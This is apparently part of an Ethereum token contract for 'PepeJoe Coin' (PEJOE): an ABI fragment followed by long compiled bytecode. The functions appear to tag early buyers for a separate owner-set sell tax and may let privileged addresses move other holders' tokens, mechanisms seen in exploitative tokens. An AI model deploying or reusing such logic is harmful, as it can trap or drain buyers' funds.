"function"},{"inputs":[],"name":"sellTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"skipTheSnipas","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"}],"name":"withdrawTokenlst","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"withdrawTokenlst","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"wls","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a06040526040518060400160405280600c81526020017f506570654a6f6520436f696e0000000000000000000000000000000000000000815250600690816200004a919062000e7a565b506040518060400160405280600581526020017f50454a4f450000000000000000000000000000000000000000000000000000008152506007908162000091919062000e7a565b506103e860216b015bfc9298de952e2f400000620000b0919062000f90565b620000bc91906200100a565b6008556103e860216b015bfc9298de952e2f400000620000dd919062000f90565b620000e991906200100a565b60095561271060056b015bfc9298de952e2f4000006200010a919062000f90565b6200011691906200100a565b600a5573e978cc128c6bc6bf6e8d1b7e1967d6e122984ab6600b60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061dead600c60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000601060016101000a81548160ff0219169083151502179055506000601060026101000a81548160ff0219169083151502179055506000601060036101000a81548160ff02191690831515021790555060006011556000601255600060135573646c1acfa1ba3474411b915b1d75a0d9638cf2ba601560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200027357600080fd5b5060068054620002839062000c69565b80601f0160208091040260200160405190810160405280929190818152602001828054620002b19062000c69565b8015620003025780601f10620002d65761010080835404028352916020019162000302565b820191906000526020600020905b815481529060010190602001808311620002e457829003601f168201915b505050505060078054620003169062000c69565b80601f0160208091040260200160405190810160405280929190818152602001828054620003449062000c69565b8015620003955780601f10620003695761010080835404028352916020019162000395565b820191906000526020600020905b8154815290600101906020018083116200037757829003601f168201915b50505050508160039081620003ab919062000e7a565b508060049081620003bd919062000e7a565b505050620003e0620003d46200099160201b60201c565b6200099960201b60201c565b620003fe336b015bfc9298de952e2f40000062000a5f60201b60201c565b6003601060006101000a81548160ff0219169083600381111562000427576200042662001042565b5b02179055506000737a250d5630b4cf539739df2c5dacb4c659f2488d90508073ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250506001600e60006200048f62000bcc60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600e6000600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600e60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600e6000737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600e6000600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600e6000601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600d600060805173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600d60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600d6000600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600d60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600d6000600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600d6000601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550506200115d565b600033905090565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000ad1576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000ac890620010d2565b60405180910390fd5b62000ae56000838362000bf660201b60201c565b806002600082825462000af99190620010f4565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000bac919062001140565b60405180910390a362000bc86000838362000bfb60201b60201c565b5050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000c8257607f821691505b60208210810362000c985762000c9762000c3a565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b60006008830262000d027fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000cc3565b62000d0e868362000cc3565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000d5b62000d5562000d4f8462000d26565b62000d30565b62000d26565b9050919050565b6000819050919050565b62000d778362000d3a565b62000d8f62000d868262000d62565b84845462000cd0565b825550505050565b600090565b62000da662000d97565b62000db381848462000d6c565b505050565b5b8181101562000ddb5762000dcf60008262000d9c565b60018101905062000db9565b5050565b601f82111562000e2a5762000df48162000c9e565b62000dff8462000cb3565b8101602085101562000e0f578190505b62000e2762000e1e8562000cb3565b83018262000db8565b50505b505050565b600082821c905092915050565b600062000e4f6000198460080262000e2f565b1980831691505092915050565b600062000e6a838362000e3c565b9150826002028217905092915050565b62000e858262000c00565b67ffffffffffffffff81111562000ea15762000ea062000c0b565b5b62000ead825462000c69565b62000eba82828562000ddf565b600060209050601f83116001811462000ef2576000841562000edd578287015190505b62000ee9858262000e5c565b86555062000f59565b601f19841662000f028662000c9e565b60005b8281101562000f2c5784890151825560018201915060208501945060208101905062000f05565b8683101562000f4c578489015162000f48601f89168262000e3c565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000f9d8262000d26565b915062000faa8362000d26565b925082820262000fba8162000d26565b9150828204841483151762000fd45762000fd362000f61565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000620010178262000d26565b9150620010248362000d26565b92508262001037576200103662000fdb565b5b828204905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602160045260246000fd5b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620010ba601f8362001071565b9150620010c78262001082565b602082019050919050565b60006020820190508181036000830152620010ed81620010ab565b9050919050565b6000620011018262000d26565b91506200110e8362000d26565b925082820190508082111562001129576200112862000f61565b5b92915050565b6200113a8162000d26565b82525050565b60006020820190506200115760008301846200112f565b92915050565b608051613bd6620011b860003960008181610a4c01528181610e4501528181610fe2015281816112dc01528181611387015281816114ba01528181611501015281816127ed015281816128e601526129890152613bd66000f3fe6080604052600436106102085760003560e01c80638baa824911610118578063cc41307f116100a0578063ef437ff51161006f578063ef437ff5146107a6578063f2fde38b146107cf578063f4029fc0146107f8578063fb201b1d14610802578063fca675a8146108195761020f565b8063cc41307f146106c6578063d931d7be146106ef578063dd62ed3e1461072c578063e5b37a65146107695761020f565b8063a014f37d116100e7578063a014f37d146105cb578063a457c2d7146105f6578063a9059cbb14610633578063aa4bde2814610670578063b61b64fa1461069b5761020f565b80638baa82491461050d5780638c0b5e221461054a5780638da5cb5b1461057557806395d89b41146105a05761020f565b8063313ce5671161019b57806349bd5a5e1161016a57806349bd5a5e1461044c57806354b762a61461047757806370a08231146104a2578063715018a6146104df578063751039fc146104f65761020f565b8063313ce5671461038e57806333ee1793146103b957806339509351146103e45780633eb5d9b2146104215761020f565b8063095ea7b3116101d7578063095ea7b3146102be5780631694505e146102fb57806318160ddd1461032657806323b872dd146103515761020f565b806303fd2a45146102145780630445b6671461023f57806306fdde031461026a5780630797ad6d146102955761020f565b3661020f57005b600080fd5b34801561022057600080fd5b50610229610844565b6040516102369190612a60565b60405180910390f35b34801561024b57600080fd5b5061025461086a565b6040516102619190612a94565b60405180910390f35b34801561027657600080fd5b5061027f610870565b60405161028c9190612b3f565b60405180910390f35b3480156102a157600080fd5b506102bc60048036038101906102b79190612b92565b610902565b005b3480156102ca57600080fd5b506102e560048036038101906102e09190612beb565b610a27565b6040516102f29190612c46565b60405180910390f35b34801561030757600080fd5b50610310610a4a565b60405161031d9190612cc0565b60405180910390f35b34801561033257600080fd5b5061033b610a6e565b6040516103489190612a94565b60405180910390f35b34801561035d57600080fd5b5061037860048036038101906103739190612cdb565b610a78565b6040516103859190612c46565b60405180910390f35b34801561039a57600080fd5b506103a3610aa7565b6040516103b09190612d4a565b60405180910390f35b3480156103c557600080fd5b506103ce610ab0565b6040516103db9190612a94565b60405180910390f35b3480156103f057600080fd5b5061040b60048036038101906104069190612beb565b610ab6565b6040516104189190612c46565b60405180910390f35b34801561042d57600080fd5b50610436610aed565b6040516104439190612a94565b60405180910390f35b34801561045857600080fd5b50610461610af3565b60405161046e9190612a60565b60405180910390f35b34801561048357600080fd5b5061048c610b19565b6040516104999190612c46565b60405180910390f35b3480156104ae57600080fd5b506104c960048036038101906104c49190612b92565b610b95565b6040516104d69190612a94565b60405180910390f35b3480156104eb57600080fd5b506104f4610bdd565b005b34801561050257600080fd5b5061050b610bf1565b005b34801561051957600080fd5b50610534600480360381019061052f9190612b92565b610c21565b6040516105419190612c46565b60405180910390f35b34801561055657600080fd5b5061055f610c41565b60405161056c9190612a94565b60405180910390f35b34801561058157600080fd5b5061058a610c47565b6040516105979190612a60565b60405180910390f35b3480156105ac57600080fd5b506105b5610c71565b6040516105c29190612b3f565b60405180910390f35b3480156105d757600080fd5b506105e0610d03565b6040516105ed9190612c46565b60405180910390f35b34801561060257600080fd5b5061061d60048036038101906106189190612beb565b610d4f565b60405161062a9190612c46565b60405180910390f35b34801561063f57600080fd5b5061065a60048036038101906106559190612beb565b610dc6565b6040516106679190612c46565b60405180910390f35b34801561067c57600080fd5b50610685610de9565b6040516106929190612a94565b60405180910390f35b3480156106a757600080fd5b506106b0610def565b6040516106bd9190612a94565b60405180910390f35b3480156106d257600080fd5b506106ed60048036038101906106e89190612beb565b610df5565b005b3480156106fb57600080fd5b5061071660048036038101906107119190612b92565b611125565b6040516107239190612c46565b60405180910390f35b34801561073857600080fd5b50610753600480360381019061074e9190612d65565b611145565b6040516107609190612a94565b60405180910390f35b34801561077557600080fd5b50610790600480360381019061078b9190612b92565b6111cc565b60405161079d9190612c46565b60405180910390f35b3480156107b257600080fd5b506107cd60048036038101906107c89190612dd1565b6111ec565b005b3480156107db57600080fd5b506107f660048036038101906107f19190612b92565b61124f565b005b6108006112d2565b005b34801561080e57600080fd5b506108176115bb565b005b34801561082557600080fd5b5061082e61164b565b60405161083b9190612e88565b60405180910390f35b600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600a5481565b60606003805461087f90612ed2565b80601f01602080910402602001604051908101604052809291908181526020018280546108ab90612ed2565b80156108f85780601f106108cd576101008083540402835291602001916108f8565b820191906000526020600020905b8154815290600101906020018083116108db57829003601f168201915b5050505050905090565b61090a61165e565b8073ffffffffffffffffffffffffffffffffffffffff1663a9059cbb600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b81526004016109829190612a60565b602060405180830381865afa15801561099f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109c39190612f18565b6040518363ffffffff1660e01b81526004016109e0929190612f45565b6020604051808303816000875af11580156109ff573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a239190612f83565b5050565b600080610a326116dc565b9050610a3f8185856116e4565b600191505092915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b6000600254905090565b600080610a836116dc565b9050610a908582856118ad565b610a9b858585611939565b60019150509392505050565b60006012905090565b60125481565b600080610ac16116dc565b9050610ae2818585610ad38589611145565b610add9190612fdf565b6116e4565b600191505092915050565b60115481565b601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc6016549081150290604051600060405180830381858888f19350505050158015610b85573d6000803e3d6000fd5b5060006016819055506001905090565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610be561165e565b610bef60006122f3565b565b610bf961165e565b6b015bfc9298de952e2f4000006008819055506b015bfc9298de952e2f400000600981905550565b600f6020528060005260406000206000915054906101000a900460ff1681565b60085481565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610c8090612ed2565b80601f0160208091040260200160405190810160405280929190818152602001828054610cac90612ed2565b8015610cf95780601f10610cce57610100808354040283529160200191610cf9565b820191906000526020600020905b815481529060010190602001808311610cdc57829003601f168201915b5050505050905090565b6000610d0d61165e565b6003601060006101000a81548160ff02191690836003811115610d3357610d32612e11565b5b0217905550600060118190555060006012819055506001905090565b600080610d5a6116dc565b90506000610d688286611145565b905083811015610dad576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da490613085565b60405180910390fd5b610dba82868684036116e4565b60019250505092915050565b600080610dd16116dc565b9050610dde818585611939565b600191505092915050565b60095481565b60165481565b6000600267ffffffffffffffff811115610e1257610e116130a5565b5b604051908082528060200260200182016040528015610e405781602001602082028036833780820191505090505b5090507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610eae573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ed291906130e9565b81600081518110610ee657610ee5613116565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250503081600181518110610f3557610f34613116565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600081600181518110610f8557610f84613116565b5b60200260200101519050600d60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611078577f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663b6f9de958460008588426040518663ffffffff1660e01b8152600401611041949392919061323e565b6000604051808303818588803b15801561105a57600080fd5b505af115801561106e573d6000803e3d6000fd5b505050505061111f565b61108284846123b9565b8073ffffffffffffffffffffffffffffffffffffffff166323b872dd85846001815181106110b3576110b2613116565b5b6020026020010151866040518463ffffffff1660e01b81526004016110da9392919061328a565b6020604051808303816000875af11580156110f9573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061111d9190612f83565b505b50505050565b600e6020528060005260406000206000915054906101000a900460ff1681565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600d6020528060005260406000206000915054906101000a900460ff1681565b6111f461165e565b80600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b61125761165e565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036112c6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112bd90613333565b60405180910390fd5b6112cf816122f3565b50565b6112da61165e565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015611345573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061136991906130e9565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396307f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156113f0573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061141491906130e9565b6040518363ffffffff1660e01b8152600401611431929190613353565b6020604051808303816000875af1158015611450573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061147491906130e9565b601460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506114ff307f00000000000000000000000000000000000000000000000000000000000000007fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6116e4565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d719343061154630610b95565b600080611551610c47565b426040518863ffffffff1660e01b81526004016115739695949392919061337c565b60606040518083038185885af1158015611591573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906115b691906133dd565b505050565b6115c361165e565b601060029054906101000a900460ff1615611613576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160a9061347c565b60405180910390fd5b6001601060026101000a81548160ff0219169083151502179055506001601060036101000a81548160ff021916908315150217905550565b601060009054906101000a900460ff1681565b6116666116dc565b73ffffffffffffffffffffffffffffffffffffffff16611684610c47565b73ffffffffffffffffffffffffffffffffffffffff16146116da576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116d1906134e8565b60405180910390fd5b565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611753576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161174a9061357a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036117c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117b99061360c565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516118a09190612a94565b60405180910390a3505050565b60006118b98484611145565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146119335781811015611925576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161191c90613678565b60405180910390fd5b61193284848484036116e4565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036119a8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161199f9061370a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a17576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a0e9061379c565b60405180910390fd5b600d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015611abb5750600d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611b1057601060029054906101000a900460ff16611b0f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b0690613808565b60405180910390fd5b5b600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015611bb45750600e60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611cad57601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614611cac57600854811115611c53576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c4a9061389a565b60405180910390fd5b600954611c5f83610b95565b82611c6a9190612fdf565b1115611cab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ca29061392c565b60405180910390fd5b5b5b6000819050600d60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015611d565750600d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156122e257601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161480611e045750601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b156121f457600854821115611e4e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e45906139be565b60405180910390fd5b8373ffffffffffffffffffffffffffffffffffffffff16601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16148015611ef55750600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015611f2d57503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b15611fff5760006003811115611f4657611f45612e11565b5b601060009054906101000a900460ff166003811115611f6857611f67612e11565b5b03611fc6576001600f60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b6000606460115484611fd891906139de565b611fe29190613a4f565b9050611fef853083612407565b8083611ffb9190613a80565b9150505b8273ffffffffffffffffffffffffffffffffffffffff16601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161480156120a65750600e60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156120de57503073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b80156120f65750601060039054906101000a900460ff165b801561210f5750601060019054906101000a900460ff16155b156121ef576000601254905060011515600f60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161515036121795760135490505b6001601060016101000a81548160ff02191690831515021790555061219c61267d565b6000601060016101000a81548160ff0219169083151502179055506000606482856121c791906139de565b6121d19190613a4f565b90506121de863083612407565b80846121ea9190613a80565b925050505b6122e1565b60011515600f60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615151480156122a257508273ffffffffffffffffffffffffffffffffffffffff16601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b156122e05760006064601354846122b991906139de565b6122c39190613a4f565b90506122d0853083612407565b80836122dc9190613a80565b9150505b5b5b6122ed848483612407565b50505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600030905060006123ca8285611145565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146124015761240084838584036116e4565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612476576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161246d9061370a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036124e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016124dc9061379c565b60405180910390fd5b6124f0838383612744565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015612576576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161256d90613b26565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516126649190612a94565b60405180910390a3612677848484612749565b50505050565b600061268830610b95565b03156127425760008061269a30610b95565b9050600047905060006126ce600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16610b95565b90506000600a5484111561273c574792506126ea84600061274e565b82476126f69190613a80565b9450600a54821115612722578061270e576000612710565b845b8561271b9190613a4f565b6016819055505b84601660008282546127349190612fdf565b925050819055505b50505050505b565b505050565b505050565b6000600267ffffffffffffffff81111561276b5761276a6130a5565b5b6040519080825280602002602001820160405280156127995781602001602082028036833780820191505090505b50905030816000815181106127b1576127b0613116565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612856573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061287a91906130e9565b8160018151811061288e5761288d613116565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250503073ffffffffffffffffffffffffffffffffffffffff1663095ea7b37f00000000000000000000000000000000000000000000000000000000000000007fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b8152600401612943929190612f45565b6020604051808303816000875af1158015612962573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906129869190612f83565b507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac94784848430426040518663ffffffff1660e01b81526004016129e8959493929190613b46565b600060405180830381600087803b158015612a0257600080fd5b505af1158015612a16573d6000803e3d6000fd5b50505050505050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000612a4a82612a1f565b9050919050565b612a5a81612a3f565b82525050565b6000602082019050612a756000830184612a51565b92915050565b6000819050919050565b612a8e81612a7b565b82525050565b6000602082019050612aa96000830184612a85565b92915050565b600081